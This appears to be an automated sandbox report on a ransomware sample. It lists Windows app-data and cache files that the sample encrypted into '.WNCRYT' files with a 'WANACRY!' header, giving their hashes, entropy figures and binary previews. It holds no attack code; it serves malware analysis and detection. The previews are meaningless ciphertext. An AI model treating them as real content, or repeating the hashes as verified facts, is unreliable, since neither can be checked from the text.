                                C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask02_23_14_01_00_1738.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):872
                                Entropy (8bit):7.789819309298225
                                Encrypted:false
                                SSDEEP:12:bkEE4/UkVTvQ8hvTJaZkTzg8i0C+MfUfLnhX6j50KkmcZKBZld0jGztzVBcvNFeX:bkJ8vBhFaZ6zL+UVIGZKdtIvLeQ4A0Yy
                                MD5:D9E2A5795AC510C2DD9F3DE23EF8360C
                                SHA1:B2075D970A9A4CC6DC1844997DE6E604B1DE40DA
                                SHA-256:C1904AFC37BC22B194E48AA3250136AA0C5ECD10F90C8906FEBF011469D59CBA
                                SHA-512:7785F3E1A17667776B23BF36FD0E8C27BF22A60721B6ED75C708D10A120E133EE35181792F566439A57906646A75E88F1399D921A51A6B11707D5ED56D73D573
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....!..n...........#.Sh..k.....b}0..o.......,.K....V..u;...Y...vE...?.....?w.....f.....-.K.G...Y....;..f.N.:.S.E3...M.m..VW. ."v?T.o.z...MH.........x...`.D..n....+M.\...^....;3j...:o.{3Tl..R.,7... .*v......_....U...l{.......=..u.f{.1px..):_S?....C.........%.=\.....HJ....A...O...QR.t...eTlSR..6>.J..P...{(....9X.Nz.r.I..^...jy.e.^.k.X..)..b..n..a..-...."...U.J.;....i...%.U..pPaJ..[....g/...F....Z....J.@YO^..x5#.....8?...t.....v.?#......zPh.w.G...R...~..z.l..g..f.V2.|........j....7&..v...........Q...3R.2....^..(.....K.Y+..f...>.x.rF.....6....d..).f9.Wvy.......L+*;.2mw;GN.3..M.`..l...N...t..19..&+. CB-.p!I..?...D....E.Q_P...v.0...<%...3..84..^5~>..W.Yra1u ..(....(.Am..;3..K(."f....JU.......&5z.w.........#1....x.z...H....-.`*.A_.c.p.q..+.GM.O*.U..G...*&m.v.[......z.uD.~..Z...V"r1.....r.l<.P.j.y...e....0..

                                C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask08_18_15_03_36_7371.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1576
                                Entropy (8bit):7.866416685064381
                                Encrypted:false
                                SSDEEP:48:bkj2PbGaQUjDYtnZtyd8Uv9AGeDSxX1r4O:oj2zG1Zt6AW
                                MD5:DBBA3A204CC8F0CFFE48D0B6528C19D0
                                SHA1:5C4C6A1A8B2A0B269EB26C12B03381F9A042F430
                                SHA-256:D5AC3046D3540989CC736690F8009DC58731B03F818D43C06A55A413BEDF0407
                                SHA-512:46AE0BEF62B9597EF86B356B46FE0D8DE4B7374FF9EF97B445E2DDF18D62F19540CC847938E0A1D60765B7B66B38D4D848088B49F1288C2E5DC62B8E511FD2EC
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......y=.cE.<.........tJ5.(X4.`....Y,B.z..]c..1......H......W)..(.-}....5......R..(.....aA"Y.J...a.SgHu]....:........E.....%....e.O..V..u.D>.Z....QYTut:........h.F5.....)......U.h.%}.g.:..|c..F8e..............`*..bbe...n.N{.Gv.m8m.!v,*._...R[.kq.~.A.e..............oyRx(+=R.....=....r.*L.z..I......C.b....#K..&..WW..Mg..]no.-..S...r..xY........,.-.DV..8E<S...5.iT.0......z...@..l....k.qN....6O..!......lUt......O!pl]....t...[...Y%.>.........f...J.%3..H.<.-....'\..!.z.()....7ya...&....".V4..M....p.P@..b=.q..b...o.D.5./h.....;.Q.L...}...S....$V...X...,Iv.....v........`[.}Yr..].1....U..[...Xo\2....Yr.....T......7....3.m.A.........WvK....}........yK:...:....\#.o...S.i.G\q.KZ...fb...q.f{.<.u..".J,\...(O...hW#Ht;..WY.6......E.....Z.[.......).?MD...'.(..,..i.T....CF...W.Y...8. .*<.%..Z.\..+yD..U*t.wbv`.])..W."@z.......i.BO.O#J..K.dq......$Y...V&:q....7_..Dh..s...Q...R....._r.J.5..s!...+.U......G.m.m......"..yR[...'J......;..v.-.p6mq3.

                                C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask08_18_15_05_51_5411.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1576
                                Entropy (8bit):7.86546786440072
                                Encrypted:false
                                SSDEEP:48:bkXw2+2+91TQtBOnuA530aMnTJcA8jyeORS5ed:oXQP1TXnP530nnTJGjmRSo
                                MD5:31D64C64338BE87DC1980EDAA15B1F99
                                SHA1:476B8EE8FAEF0A9A754FDC8EAC1AFED258F93635
                                SHA-256:7141280735032C220DB3C05D2F22FD87063A051512C169FDC4D8BF8642E9E594
                                SHA-512:398EC9D2AFCE09DC105479F128116AE2A1124CCF30A72801116712181B8929EF60168F6DC415322E59D5000F686B0D8FBC0248B80740F974C7E4B71CC6DF422C
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....._..5.%.[.%h'..\K..X.2M.a!N..9PI.)tm...r..?..}.8..X.ki.,?..........U.(.!...~.y.....m..b.H...iz3.'........p.6.....r...!......s..../Em.~i.v.H.>..p........IO.e.#.U5.`zd...&.9k.S....3+?u0.^8.....l@...~..z...4.Pc..].}.>K.Vb......Y.....m.Y.K.$.e.m....................u.!..."N......z...].R.....e..[..;L"...w.~.+.<.^....A.[DsB...[..S......&1....70.l.~^:...>al/...h...../....n..\sX.~.....T.*..Zj-]..T....n.)/.~.G..b..?..C...T.<g.....K.M.z.....F......tO....!. .+..s.....i...c........4yD.Yn}z.....*R...G..~AIk....p..o..K..Z...U_..'[..i.u.!.......7...*...~....,w.M....._....m....@a_......._......o.W.Z.X...W.:Wq..../r.......:.>....<.q...8..O.}bq..^.-..N..uN.\..(.,...%G..N>.yo.h....@.=.... b^....[_...]?..jH.........u=s.;>.Bl..TR...4..(2hD._`..._.4a.Y;.\...[g......:h..d.......5M.X..a..B....k.U6ZA.i?.2*~2..vW._...".$.....3.D..A.U...3 g...Cr.P.:...\....^!$...`ruD..-..O...5..M9.h.M.6.....\..&...&&J1.Vv.W.`..k..._D6...}..B.9..)V.6`...pH..2r...

                                C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask08_18_15_37_00_4351.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1576
                                Entropy (8bit):7.8593253453376954
                                Encrypted:false
                                SSDEEP:48:bkDmXL6wAau+Ev7c9RUlRpAeDcbLsv7sLY:oi+wAas74OTfe07l
                                MD5:27B1086077264B3AE5B151B7AEF0F10E
                                SHA1:442D676F0C000A45D56303D083E7BB1644A55412
                                SHA-256:20460D552D97A0D4308CD901AD2EE59A1769182598BFC5F722C599B8B5746224
                                SHA-512:2C3021D60976B401F2870066654ACCE22DCA8658B5B37578CDD967E284116842DCB3D5039E6AC9F2BEABD41CCDE4660F5DB4E78F10B4871C013A930AF7CF37E5
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....Xi.....y.wDA..o.....>..!...V.ck.....>'..k?.Kb...s...b2..=..:...L{.e..M..QY.b=o..M....e.Gv.:(.7*.pjO.n......u.S....../.g:4..V,/;..9*o.....O..A@........-8.%F..V.l..U.........p0..jf._.....m^.(.8J2E....8..(.Hbk?e.......*...EE...j@-.'+....@{....1............K.......G,.dH.$..;s..7..r...!P.4...l.z..1..B5..a-!(.c...H.....vMQ...6....3Q.n....)..0.3g....R..q.@..^x..<.u.Fx.,8.~yyc..=...;.q...h.`S....C=n.N.8..I..%...Ep..+=.p..B...l..S..9o..X=.W.]..?sr.z.0......i.._Z.)l..#$]i...V..q...oU@...O..B^....".d }ie....X].3....p....4;........*..=b**.OA...n.<4+....T..../R..E.S..<.3.".....$.IVE..:.....4.<...]).5..\..L.&..O....E..Y*.>.j-./+z_....!QR.......!....(8..Y..X....4o.S.|....=..../*S..i..G.p.c...jcE~...E..."Z9.S>f.oW.....7...Y.j.....(&..x.*.=..Ag...\z..qp..D.zz...7...$v".i4.r.|.nm..=.!H=.XP8...H..8?b..!..H.P;C.].....p...g..a(u.~Y..&...)CA..E..O[..^.....%>i.:..[.}........Pp...l..w....Su..yrc....xG..(.....[...,...p.N@{7..](a...@q.-..%z.8..|....

                                C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask08_26_11_08_10_4195.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):872
                                Entropy (8bit):7.758288323466848
                                Encrypted:false
                                SSDEEP:24:bk1V0ja/aqRDIFQm3hqiFaabLt/EM3rWu:bk1OWrEFQm3hqiQabLtMuWu
                                MD5:C5E821AC27A24FC960DC2B4B2AC31986
                                SHA1:92BA60F56D4F76E82FA086872C2533468E8524AB
                                SHA-256:B5B78DD2615E3AD7C8B88BA66C7A8700007A3CEFB8A0097A7BDBA4D33E07566A
                                SHA-512:3E20CB0FF536B72AD781BC397493E3791D9F20D532FA8CA8A06078F0610E2906B2C259D6F686693D3C2B79C8EAC17A0BB5238CEB053E3EE85BBABCF6141CD5FA
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....;..q..m.>.z.R....S..r9u..]/r...U....W...._-..b.']S...U.d.|,L...W.\.....J..K.6".B.z".....U&c'.Y....-\.y.$.........../..]...7..;.gO.'/...<h.......ue)..v...6K..;_KG....v........*....f.u.&..~.*.....Xe..y.#..W.(.S..Jp.;..^%....&V..0..J".nP..@A.{q....C.........,Jpp....!..P.3.<:.....(pZ.*.v(.n._.e&./._.q...l'..%.....o.d..Xq....J...-.........1a..=?..yQ6..[8~...B1.pUQ.9......'..=..8~..Nsh.}f..1k.../...Bm..9.3..n....u.\y.Gp...W1k..p..Qbs..iP.J...pk?.y..^..;.....t..u...A.\J...x..-....<..JM...B1.q...-+ ...n.N.O.{.~h....h*.&...N..U...Z..8....e..`<.S`K.\.N.do..^=.K,4(.o.@........q?..K.zh.N.....@v...h.m<....-.^....]....-(z...H.p\+.b.s........CW8[B...\@V.={.m...%2`.c.h.........F:.t.H....-(nC.=..e....1......P..T..!..spj-%M.......U..b.qx..B.Ur......1....^.|.w....,9.t..3."#.5.^8L.<y..\..+^....DY..C.WI.o.7I..b.O!....d.P..f...P.J.

                                C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask09_03_00_44_01_9156.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):872
                                Entropy (8bit):7.7621970469062225
                                Encrypted:false
                                SSDEEP:24:bkm9CPUSW0FejlAZdqJMxyZRUukyUhOXVk:bkm9OztquGHfBy
                                MD5:BDB8C29DDF21F339860BD275D7811C44
                                SHA1:28A56469546E851594E5954C9DA63AFDE781FFAF
                                SHA-256:020F337DEE7C96075D1C3A844632EB344B489A37F0EF92C147FA9E3F083A5DA8
                                SHA-512:B70F9F54557B020DE5DEA10A2652278945DD03B2D27D1715D0024BE438C6F7A725AE925815C2B6A27C171C9B0E83CEA3730A0A00E212B3533135659253D6693F
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....u/-."=............6...=q...r.&.T...G...e..!.y]_`[....A..2.Z.z.yMl...c. .o..}.|....#...X.i*...K...R..[?.....&KV.T.q..@......Eo.d.B......s&KY?.H.<...U..........D_..y..k......z.Wv.'.?+.?;.........L.2|.{.j_.."i.o=.P`~6.c..#..-D....*wg.v..z..h>.y.....C...........]!......Z...e.C...W&a.....e..M1J..r...l<.AOg.......CT.v....pq3?~...k`.n...na....iUE.U..:.`..@Z.0.yy5.).....K..D.W"...p.%^(.g9{7.0.w........OQ8.e.F..?5...9J.T.x.I.P..?.c."...wu.K#..UHhz..mZ..u...P.]]S....I...*}.|gT.V.C.{.+...f......3.H<..h.e.$.......3Z.&9J^2...p.v.w..\9..Mt...f....A,..g.#t...P...p......J.....:.#..<.b.y0...]..F-.%(.[% R_3N%.W).....m....,..d.,.vF.....mu............C.....t...\m.&b.sM...T4.....w..;+.....0.&. ...&...Ks^r..N...,..IY.....Tb....sJ.B...lF...9...U...u..-.P(.j.|9c....Q-..2A..*..+.[..L.E.P..*.B....Pf=P.Z...a..h...Cs...W4Z.;.^....`

                                C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask09_14_09_37_22_0506.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):872
                                Entropy (8bit):7.758298473843893
                                Encrypted:false
                                SSDEEP:24:bkzUZWV98sGjhar1OhSjXaYgXsN9zyO+n:bkzUZK8s4oQER1+n
                                MD5:0E4F263C62E6FB594A92088467EE4B46
                                SHA1:F3E8340518ED3C32E5E890E5C1E06D4A0F496AD1
                                SHA-256:184C98B3F925D093C3D77A7BE7235793B642A4A104156DE2925A515767205774
                                SHA-512:A24B9402C2ED32FFFF5C0F305CCE63414C89A06F55A96F4A9BFFFF9C258679AD20F8F6D6FC00F4A97B3CA05FD00AB0B6D534E9692C5AAB13F7FFF5A986EF0505
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......R.!<Q.(.W...q.UU.]....f...2.s6.RA...#....Y.w.pj..#fP...S.LA....-..*E[5...Xc....2...m...9H...2&.....P.w~.Z..d.Xw2.b.o..J.&....`.`....)....c...QX....ksNkk.x.5|m.Q.....{...#.]>....YPDPM....+v..QV.~.0.>...dv...:C...V....(PnM..TP.....7....Hc.|........C..........h.|..wR..|..".fm...C}...d..k.......... .nb..!....(n.l.".hP.e.r..... ..\..@h.KDB.y?...Q.leV..[j.c..b[....y/[7...... .S.W....F'..^...*........Q..7=.yn...(s.P...G..u..rpf..En.E.d.../C.y.!i._....sp.'..d<.."...t...k..98:....4.a.....K.......d...<............=JU.tG.m.-Y..rR..,k2.,....N.y.P.G....o.2..N}..6....|..`..Q^...N0.1......MB\.7...5F.P..K.C.d...}......?a/.z..^...w3...nQ..e.y`t.B.E ..W.6^.=Q....... A"..1f...3.6o.....,z.N..2n.Rg.&......[:.m^=)...-J.W.C...5%...h.2.d.Y.1M...>...1....U..W....h,=aOD.D..=nxN.....T..Z.uHs.+.~..T.....c.*.U..(.e.S...s..y..v9.h..

                                C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask09_22_11_18_56_1666.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):872
                                Entropy (8bit):7.743991196657312
                                Encrypted:false
                                SSDEEP:12:bkE3RC6jjK0SkYV6mWevt1+DT7Wg5X2kjIt1P8hcdo0QXmnwkgHBl8ggLn0d:bkJ6jUzEi87Wgt5j/cS0C9kE7Vgz0d
                                MD5:AF1562086B60405060CFDA4A6D76C6F1
                                SHA1:9EC07CF254801B58A92AE22CC86BBE859CE52301
                                SHA-256:D48D24D16E52843CBF2D1FE0CE2E2F5FBD6DFA1FCBD428DE5BD9317148910D3C
                                SHA-512:847F7843D738224C30BA2F2B76BFB58CA405807051E3784A8B259031A39155481EAB205ACBE7855040B87501DAD4FEB2EE1342282E996ED9F3466F5242BBCE2D
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....=.Vn..w.i..5..~...>.i...4l..x.bGQV..]gk.3Pla.@$..;.}...(G\.=.6.L.w$.'^..Y.]...?.,...sQ..P0}......?...0J..?....W..7.Tk...!.z-.......qL.x..r.5'C.....4.Y.v&A.......c.........36.E.=..........J...M.+.~._.k..,4...RY..,.(.s.X.K.B'.<x..w...!aF..`~'....C........(lD.5...3V....x.."...+l%H..f..........}..h....`.?....gh.]....*..T.CC.4.tB.q.U..e....1....;%.%bd...*.(...UT?G\.....?..$......9...;.q.g......Y......bSj.m.yc...I...C.....$..8..#......W!..E..U..-.=.....~\7q.......|...,......by../$.}8j...2.:zb....&...].....=~...x#..K......U...>.'.........ew...~..M..O$.$.....v.t.T..<.;b.....y..o.../.#....w.. [1....xzN......w.].GUnA.tV.-.d..r......;....x`gL.R.T.!K4..H%.......JY...#.9.w..."...tY58.Ka*_.4Z .P?'...0.8.k...Hz,ob.3.....Q..C.qw.. .q.\.v...y.b..bb....I*.^.u..{..a...R.T..5......bE2I.?..6...B5..../M...-..@KY./..Q..?.

                                C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask09_30_13_13_40_5442.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):872
                                Entropy (8bit):7.755812860481371
                                Encrypted:false
                                SSDEEP:24:bkRwkPDitYsFQResysVcHOiThBGx+1TUGbYt+uArKhn:bkRwyDUxjQi1B7YGAAyn
                                MD5:429DFB5C765940277846B578268DCC1A
                                SHA1:848E7D849DA238421A3F94B1369AD45457BD2213
                                SHA-256:1D85357D412250DD6A7CD544C0E740751CAC6EA11636A933233166F059C8206A
                                SHA-512:4D2C7CE15BC23C014FD160C2FCFE2D26AD2A43E2EF9AC6BDD7213BBED2A07B1C61BA991E55BEFADC6F2E17D1E74217B073C3631133C592C14434789A8BC9073D
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!...."...OS..)F.5.`..`?.n2.6..)i................s....Z...E.Bc.+.i,4k.-....:....]*o(}..c]...o.7|..[.......r/.Z.'.k..o:r..!.rR......].F.#UtK.V`..Q..J.GL!.8]...0.W....D..w.0......4......V..}H.....`.....H....y....{..(.y6x.c..Kkh..`.$".......f.L..>+.L.5....C.........tZb4j!.B&..u.A..d.6%..Y....... ...y.f..jN.l...'....>.L......].~.).....2'cj......CQ>..n.@Q.z..AG-..D...a5..g..~....|.7>.....q.......C..hF(. ...=1)OHs.{.c&...............0....)...E.{.f...'.gbXd<jFE. ...t..g..$0...;..VbL.......`.un3.9...,..h..,..o.......'"..3....Q9.H..#.{c.A..T/O.CC{$Sh...z..w.#..z.g..]pvmw.9%z...c.|..>L..7...b.z........N.H......b._....5..Y^.q....f../{K.e.b#.1...T........F....r....g..4...|....P.....K.7Iu Z.eO.9UI@c..~..}.3.'.g...).=.2.~.m.Z...iZF.C..Oxnfy.w!,.3.....C...T..Zg..........kz.4.]U.i..).OQ.1^..C....>.c4:2A3j..dj..3.H.[..5.@X.Q.%..

                                C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.PostInstallationTask08_17_13_19_38_8611.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1880
                                Entropy (8bit):7.902265530217827
                                Encrypted:false
                                SSDEEP:48:bkdKGekHg3+6xIOWpjG/KE2Oa6c3sHHOS:odKGekA3+6xhajpoaHG
                                MD5:CFAF3A19761F851518D08952B07F6521
                                SHA1:81362181CA1AD87C33C143C58E457B8070149B0F
                                SHA-256:A27E6C54B0869131554352C8F0E4E42A04A9AE4A6E814CBC8266485A1735A573
                                SHA-512:8112F0F3756F7F6F192C9F767E49B77BB4983539411C8791B421325C256468149C8DA0A7973D799CD9889A7707E1F60ED739F811B33FB63F035CB99027EE7955
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.......J.~p.....S.U....i...Q.c............va.........e...v....<p......$......#..oQ.'..HU...6..iyV..7(>.*.g.+>.v..J..yQ%..Z......X.`.m..G.f.nwV...p...\...e..T.3.....6.G.....-...C.`'T.I.......t..M..*.).1J.e..p.X..f......>.J9:y}.1.......r.0&..iA..........5.......k....z)...4.q....f...*..D)..a..\ ...xFn(d..6.yk.|.7.Q6.U...QqD^.i..=..z..S.....8A60.x..W.:.%5..[.*... . ..6V`.x-8_J..A;..w. ....xb`d..E6a..Yp3.'...f..pK .G...Hj.E7=.b......{.}.._H.O(x.....M3.$: ..ZS.H3./L.A..;A{s./Z..S.........,.m......V.V41.T....UZ...n.%.h..^Q........^.H Lq$.k...Z......D.....on.I.j...O.gt&......)..c.6..<.C]|.....i.?&...[tJ....a...]..N.B...il.C..4.3E{B$r.`%....P..J...$9.....?...K!z..).....Pir./F]7/.......#.U......A....,l.#\.f......A.v.3bL...D\*..".. .2...r..o8..q.Y.#..o.g.O........X}...6q...K..*.L~...5r7.1...=j...R......O.....B".T.Y.yJ.;tpe.`.U...... .my..i.L.~4..vps..v?.F0...<..!p....jA5.}.n]..z......Z_.q...e2DP$..(..\....[\.6....m..yx.i).I]......a....1Ll.}

                                C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.PostInstallationTask08_17_13_50_48_4321.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1944
                                Entropy (8bit):7.914587777961285
                                Encrypted:false
                                SSDEEP:48:bkuv0FAzJCdgtW34WPi55KzadPbjvzzzqfNCwo+oqC6adXx+51K:oQJcgAIjAzWP/zqfHob6aXP
                                MD5:49D69851B998724180F2550B91FC2C31
                                SHA1:8FFF4D3EF100421860563DF636CF1A28B9A2E6F4
                                SHA-256:BB34AB8B340C5F608400D3221D74F472DAAEBF7400B733687EDC39BB034811DF
                                SHA-512:2A6CC5E86AF66B8884013A65E8578CCF6C89035BC48CE2028249FB9448368244D167579B386940AE7461771EDF6F4A31438BE1272888E2CB6256A81A3AF00B03
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....Z..5....4f.....5..Y.....u.w;m..Z..rO.~f..U..{#.3..o..6.&J.]....8.i..5b*.....bw^.n..k..%....!.. ^(b...2..i.'.=..I{v*4@{...$f...3m..!{.....F..s...dG.(u......I.fhM..~...8...r.FJ..... .Y........Tg*..)..hA.U....r.L....u<.u.:[..... .x......YSebl..j'.2.../....s........O.....u..>..'..U."...2....V..N.N...+`n./..9}LU|.....y.E..tD.|.wj.cx...._o.Sb.f..w .M..x[|b..>...{...R..G...3%*....H....?.q.....f.v...A...*......[..P..``...[.]...........O.... 2m..#..}....2.j...R4M..ab.g.E..:.....;...0.B.~I....#..I.:T..f.......1...oXly~.....F..P.`...F[9sI1.#-Pb.....E2.......,.7N...N$..w.H..q...$..Lv.j.&..+c.wT?.......#....JHl|.f......ea.....z9...@.6....Q2.4K<..m)..k.G........_+....%P.Rb.c<.#..P.>..........l.x+.*.v~..p.J.).....o. ..V..D..u.`.....d.Fx%f...W. 0....&...t[.d...9Z.2.R4..d........l......D*....M..v.NY.,..@.@C.b'..%.B....K.~..U.{.T..-.[I...O.1...yJ.....5Tk_.......C.......E.VD.......Y6M.0.....1..wX.p...!.g(.?.q.DJ..{..k.E.:Jc.hr...b..h.......If}4

                                C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.PostInstallationTask08_18_17_07_25_4954.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1576
                                Entropy (8bit):7.865898889140843
                                Encrypted:false
                                SSDEEP:48:bk9hvMolScUd71q/7KPW7tNgXW4Xa4soum3Ncc9+:ovvMooD7mOP0NyzK4s6cp
                                MD5:F5A334730C560A18702C801D99E6E595
                                SHA1:9A0F143E22F992E039B5FCFA9CB8B13A1547B487
                                SHA-256:30F97934AD4DC785A30F645C43FAD89631712C73422513CCD75C153B4158763A
                                SHA-512:D44C49DDD3299354B8F4E1626BA49FE70425C724E0C1C7C70C2F97A2807F9A1364CB8904EA810B7A191C3AF192C61954E124FF97499978F822E777689997F2B4
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....T./'er...t.;.].....#.G....q....`.....8..|..09...K(.V.M....a..lY.cP0X..W.;..v..KN`....YJ.H=.K."g..J.*%........2.....[.V...._.a.q..."..BN..bJK.86.....Z".@..5............].t..Q.....4.T8..e..T#..s..V.V...]$...}DD.CVx..c.F...4}.b...A.!.d\%.,...4....v..............}i.X..{A.C....9...>..T2....O^.A6.|..I..T..?......T../ZS'..9~q..V&pe..a....W?..lD...<...<L.#.i.~....%.qHn^.&./.k..D.E`..5].mWa....5.g..=.a...8....>.l..|.z....0..I.uN..n............Eb$..Yv..-bu..._......WR.#.c%....Te.=Z.......E...n......t.....b..n.q=.Y.n*r\..r......x.gs.L1...V..8......oL3.......aH...........B\..k.[.....7...w..w.....H.=0..V#*.P..W.".n...[.|..$.....-..F...a.......v..s....".^...H3q.&\._.o.....>.....7hg...$.2.x|.......>Le..[.L...Ga...bt....a.3.oa..$!..q).d.E-.P.b.9..:E...G(l.Xbgx.:%......)...F..h..U....^....u....O.....s.k..D...:./..|!.9..&.m^JH.7l.SD..4AvG.yh. .k.t.._^....bB....O...H.Ur/U.M...........g...m.(......X...d......K.^....@.X...Q.h}C.

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_10[1].txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):202120
                                Entropy (8bit):7.999126120005269
                                Encrypted:true
                                SSDEEP:6144:hCAApLJlOsCdO3WNB1xovqaPnpoq7byNcV1j6P5D778NQ:hFAlAObdnlmyV1j6NCQ
                                MD5:E8E2DB3E66C5218858E0F002DA4EA28E
                                SHA1:3E0235C1E79116012371460108BDCB4CE7406D01
                                SHA-256:A547D6B0DE1CDB319784F1AB0C16C7FAB7A20CF2A44CDED1FE1B5D972D4DB84E
                                SHA-512:6ED6C639F2A35E821CC76AA601C85CC89C5EC1C3CFA4810B848C30F8D308E77C9D65B269B0B6DE73403F121302A29383DA86D7DEF1B5ABE7AAC092658A2E8F10
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.......|."..G@.....kSw.g. ^)..S..7.Sh #"<.%w...zs((&t...Y3..4HX...+Y....>.D..;qJ..,.....u.U.n....7......[.?.}.,...l,..X.. .Y...r....".._.k..J3..j.G...9....q....@...X.Q...+%C..%......:..lV"2d.j.Y#Ko+.....2.!e9K...2...C.&.P.-o7..-;.^*........B..U[.w..>....c........R....@_.....6....R...g8o(a..8.... $..>.{Z...M....%>..b.#.Y..z\.j...2.z...w....J.^TT..I.HF..4..@..........3.....J....^.I..........S.[.c..O.@v...f....SC.w..9.z.......0W.W..7l73=......f.,...9...9L,(..Z..a.=.. 0$..c...U(..)......%...+.....|.U3..M.,Xe......W9.L..x....Q..'u\]w^.-.\Yt.... QK........_#D....a.s"K...N$...k. u3.......VZ.H....<......!...Yz.......FnI.@Hy..........sb.W.}}.Ui.....a...t.3.u..L.s.y'...N.k.=..(....Q...n%5.....D.M..8.-..;..s..w.....x..y.p..?SR.".n.D...,.G..mg...E..5]..iT..a.-.c.CS.ZE..w|...8.........F..Y%m.H..../.C...Z.JI...j..+H.z&....p..U..D..h.ljMdt..{KgE:S2..uA.%.4.;.@..j`p:S.DEu.5......P.......%.M$...5.......G...D.k.e...F....%......JUl .7.(.F..{.../.T.JR)...'

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_11[1].txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):34536
                                Entropy (8bit):7.993831646181793
                                Encrypted:true
                                SSDEEP:768:399lNk5XUX/1l7iKC/wd1JQsqe90qmesYTlFU76mlP6e50Be:3nrk5DKSwnJfqeyj5KC/V50Be
                                MD5:A53D7DCA9829F68D76BDA2274AA058B7
                                SHA1:85A998F032BC98EAA1B2A3D9DD40BC40958CCAC2
                                SHA-256:920E373F07E017259533195050AA630B78C0610F5EC68DF1A5EA0921C50B6E01
                                SHA-512:12CC1AF3ABFB117ED499091574524F8663F7A255E43AC5286B0975A91F5E50B26F59388E637C0E83A6EEA6A084C00BA05BEB11610DA4EF312A28EA0035B33C87
                                Malicious:true
                                Reputation:unknown
